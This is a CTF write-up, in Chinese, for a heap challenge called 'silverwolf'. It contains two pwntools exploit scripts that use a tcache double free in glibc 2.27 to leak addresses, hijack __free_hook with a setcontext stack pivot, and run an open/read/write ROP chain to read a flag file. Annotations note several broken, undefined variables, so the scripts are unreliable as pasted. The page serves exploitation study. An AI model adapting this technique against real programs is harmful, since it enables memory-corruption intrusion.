这个题看起来像lonewolf,但有沙盒规则,题目给了flag的位置,很显然是用orw来做题,我们先泄露出libc基址,rop中我们注入gadget来进行栈迁移,我们这里利用 setcontext 来控制rsp
from pwn import *
# Local target plus the matching libc (symbols are read from it later).
# NOTE(review): this script binds the ELF as `elf`, but the stages below read
# `libc.sym[...]`, a name that is never assigned here -- NameError as pasted.
context.terminal = ['tmux', 'splitw', '-h']
p = process('./silverwolf')
elf = ELF('./libc-2.27.so')
def add(idx,size):
    """Drive menu choice 1 for slot `idx`, answering the Index and Size prompts."""
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))
def edit(idx,content):
    """Drive menu choice 2 for slot `idx` and send `content` at the Content prompt.

    `content` is passed through sendline() unchanged (a newline is appended).
    """
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Content: ', content)
def show(idx):
    """Drive menu choice 3 for slot `idx`; the caller reads the response itself."""
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Index: ', str(idx))
def free(idx):
    """Drive menu choice 4 for slot `idx`."""
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Index: ', str(idx))
# ---- Stage 1: leak a heap address -----------------------------------------
# Every call uses index 0, so a single slot is recycled across all of the
# allocate/edit/free steps.  The order is significant: each edit() writes into
# whatever chunk slot 0 currently references, whether or not it was freed.
add(0,0x78)
add(0,0x78)
free(0)
# Edit-after-free: slot 0 remains writable once its chunk has been released.
edit(0,'aaaaaaaa')
# Second free of the same chunk (double free).  The libc loaded at the top is
# 2.27, where a 0x78-byte request is tcache-sized and this is not detected;
# glibc >= 2.29 aborts here via the tcache `key` field -- the mitigation to
# check for when assessing a target.
free(0)
show(0)
p.recvuntil('Content: ')
# The 6 received bytes are read as a little-endian pointer (user-space
# addresses leave the top two bytes zero).  0xD0 is the author's offset back
# to the heap base; it is environment-specific and not derivable from this file.
heap_addr=u64(p.recv(6).ljust(8,'\x00'))-0xD0
success('heap_addr :'+hex(heap_addr))
# ---- Stage 2: leak a libc address -----------------------------------------
# Write the leaked heap pointer into the freed chunk, take two chunks of a
# different size, then write what looks like a forged chunk header
# (prev_size=0, size=0xD1) -- presumably so a later free() treats the region
# as a larger chunk; confirm against the binary's heap layout.
edit(0,p64(heap_addr))
add(0,0x68)
add(0,0x68)
edit(0,p64(0)+p64(0xD1))
add(0,0x78)
add(0,0x78)
# NOTE(review): the paste lost all indentation, so the loop body is ambiguous
# (some prefix of the lines that follow).  As written this is a SyntaxError;
# the original layout cannot be recovered from this page, so it is left as-is.
for i in range(4):
free(0)
edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
# Reads up to and including the first 0x7f byte (the high byte of a typical
# x86-64 libc address) and subtracts the author's fixed offset 0x3ebca0 --
# valid only for this exact libc-2.27 build.
libc_addr=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-0x3ebca0
# NOTE(review): `libc` is never bound in this script (the ELF was stored as
# `elf` at the top), so this line raises NameError as pasted.
free_hook=libc_addr+libc.sym['__free_hook']
# ---- Stage 3: plant a pointer table and resolve gadgets -------------------
# After 0x40 bytes of filler the payload is a table of pointers: free_hook, 0,
# then several heap_base-relative addresses.  The add() calls in the next
# stage hand these addresses back instead of fresh chunks -- the very next
# add(0,0x18) yields free_hook, judging by the edit(0,p64(gadget)) that
# follows it -- so the add() sizes below must not be reordered.
# NOTE(review): `heap_base`, `libc_base` and `Read` are never assigned in this
# script; the leak stages above name them `heap_addr`, `libc_addr` and
# `read_addr`.  NameError as pasted.
payload='a'*0x40+p64(free_hook)+p64(0)+ p64(heap_base + 0x4000) + p64(heap_base + 0x3000 + 0x60)
payload+= p64(heap_base + 0x1000) + p64(heap_base + 0x10A0) + p64(heap_base + 0x3000)
edit(0,payload)
add(0,0x18)
# Gadget addresses are raw offsets into libc-2.27.so found by the author; they
# are not valid for any other build.  `ret` and `open_addr` are defined but
# unused (the chain uses pop_rdi_ret + 1 as its plain `ret`, and a raw syscall
# instead of open()).
pop_rdi_ret = libc_base + 0x00000000000215bf
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x0000000000043ae8
pop_rsi_ret = libc_base + 0x0000000000023eea
ret = libc_base + 0x00000000000008aa
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
# Presumably the `syscall` instruction inside read() at a 2.27-specific offset,
# used as a raw syscall gadget.
syscall_ret = Read + 15
str_flag_addr = heap_base + 0x4000
# setcontext + 53: the gadget the writeup uses to take over rsp (see the note
# at the top of the page); again a libc-2.27-specific offset.
gadget = libc_base + libc.sym['setcontext'] + 53
# ---- Stage 4: open/read/write chain, then trigger -------------------------
# open(str_flag_addr, 0) via syscall number 2, read(3, heap_base+0x3000, 0x30),
# then write(1, ...) -- rsi/rdx are not reset before write, so it reuses the
# values left from read (confirm they survive the call).  Only these three
# syscalls are issued, consistent with the sandbox the writeup mentions.
rop_chain = p64(pop_rdi_ret) + p64(str_flag_addr)
rop_chain += p64(pop_rsi_ret) + p64(0)
rop_chain += p64(pop_rax_ret) + p64(2)
rop_chain += p64(syscall_ret)
rop_chain += p64(pop_rdi_ret) + p64(3)
rop_chain += p64(pop_rsi_ret) + p64(heap_base + 0x3000)
rop_chain += p64(pop_rdx_ret) + p64(0x30)
rop_chain += p64(read_addr)
rop_chain += p64(pop_rdi_ret) + p64(1)
rop_chain += p64(write_addr)
# Each add() below returns one of the addresses planted in stage 3 and the
# edit() after it fills that address: the gadget where free_hook came back,
# the "./flag" string, the chain split across two chunks, and an 8-byte stack
# pointer plus a plain `ret` -- presumably the rsp/rcx values the setcontext
# gadget loads.  The final free(0) runs the hooked free with everything in place.
edit(0,p64(gadget))
add(0,0x38)
edit(0,'./flag\x00')
add(0,0x78)
edit(0,rop_chain[:0x60])
add(0,0x48)
edit(0,rop_chain[0x60:])
add(0,0x68)
edit(0,p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0,0x58)
free(0)
p.interactive()
沙盒规则,泄露libc的方式和lonewolf类似,利用orw来进行注入
from pwn import *
context.terminal=["gnome-terminal",'-x','sh','-c']
# NOTE(review): chained assignment -- both `p` and `remote` become the empty
# string, which also shadows pwntools' remote().  The target host/port were
# presumably stripped from the page; every p.<call> below fails as pasted.
p=remote=("")
# libc used for symbol lookups (and the build the hard-coded offsets belong to).
libc = ELF('./libc-2.27.so')
def add(size):
    """Drive menu choice 1 for slot 0 (index is hard-coded), sending `size`."""
    p.sendlineafter("Your choice: ", "1")
    p.sendlineafter("Index: ", '0')
    p.sendlineafter("Size: ", str(size))
def delete():
    """Drive menu choice 4 for slot 0 (index is hard-coded)."""
    p.sendlineafter("Your choice: ", "4")
    p.sendlineafter("Index: ", '0')
def edit(c="a"):
    """Drive menu choice 2 for slot 0 and send `c` (default "a") at the Content prompt."""
    p.sendlineafter("Your choice: ", "2")
    p.sendlineafter("Index: ", '0')
    p.sendlineafter("Content: ", c)
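def show():
    """Drive menu choice 3 for slot 0 and consume the Content prompt.

    Bug fix: the original passed the integer 3 to sendline(), which pwntools
    cannot concatenate with its newline (TypeError); every other helper on this
    page sends the choice as a string.
    """
    p.sendlineafter("Your choice: ", "3")
    p.sendlineafter("Index: ", '0')
    p.recvuntil("Content: ")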
# ---- Stage 1: heap leak (the helpers hard-code slot 0) --------------------
add(0x70)
delete()
# Edit-after-free: 8 zero bytes plus one 'a' written into the freed chunk.
edit(p64(0)+'a')
# Double free of the same chunk; glibc 2.27 (the libc loaded above) does not
# detect it, glibc >= 2.29 aborts here via the tcache `key` check.
delete()
show()
# 6-byte little-endian pointer; 0x260 is this script's environment-specific
# offset to the heap base (the first script on the page uses 0xD0).
heap_addr=u64(p.recv(6)+'\x00'*2)-0x260
# ---- Stage 2: libc leak ---------------------------------------------------
# Point the freed chunk at heap_addr+0x10, take two allocations, then write
# 0x40 bytes of 0x07 through slot 0.  The delete()+show() that follow expose a
# libc pointer; the page does not document why, so verify with a debugger.
edit(p64(heap_addr+0x10))
add(0x70)
add(0x70)
edit('\x07'*0x40)
delete()
show()
# Keep the last 6 bytes up to the first 0x7f and subtract the author's fixed
# offset 0x3ebca0 (libc-2.27 build-specific).
libc_base = u64( p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
# Gadget offsets into libc-2.27.so found by the author; valid for that build
# only.  `ret` and `Open` are defined but unused (the chain uses
# pop_rdi_ret + 1 as its `ret`, and a raw syscall instead of open()).
pop_rdi_ret = libc_base + 0x00000000000215BF
pop_rdx_ret = libc_base + 0x0000000000001B96
pop_rax_ret = libc_base + 0x0000000000043AE8
pop_rsi_ret = libc_base + 0x0000000000023EEA
ret = libc_base + 0x00000000000008AA
Open = libc_base + libc.sym['open']
Read = libc_base + libc.sym['read']
Write = libc_base + libc.sym['write']
# Presumably the `syscall` instruction inside read(), used as a raw syscall
# gadget; 2.27-specific offset.
syscall = Read + 15
# NOTE(review): `heap_base` is never assigned in this script (the leak above is
# named `heap_addr`); NameError as pasted.
FLAG = heap_base + 0x4000
# setcontext + 53: the gadget the writeup uses to take over rsp.
gadget = libc_base + libc.sym['setcontext'] + 53
# open(FLAG, 0) via syscall number 2, read(3, heap_base+0x3000, 0x30), then
# write(1, ...) reusing the rsi/rdx left by read (confirm they survive the
# call).  Only open/read/write are issued.
orw = p64(pop_rdi_ret) + p64(FLAG)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(heap_base + 0x3000)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
# NOTE(review): nothing between the libc leak and this line determines where
# this write lands -- the first script on the page has an extra stage here that
# this paste lacks -- so the add()/edit() pairs below cannot work as pasted.
edit(p64(gadget))
add(0x38)
edit('./flag\x00')
add(0x78)
edit(orw[:0x60])
add(0x48)
edit(orw[0x60:])
add(0x68)
# A stack pointer into the chain plus a plain `ret` (pop_rdi_ret + 1);
# presumably the values the setcontext gadget loads as rsp/rcx.
edit(p64(heap_base + 0x3000) + p64(pop_rdi_ret + 1))
add(0x58)
# NOTE(review): `free` is not defined in this script; its helper is delete().
free()
p.interactive()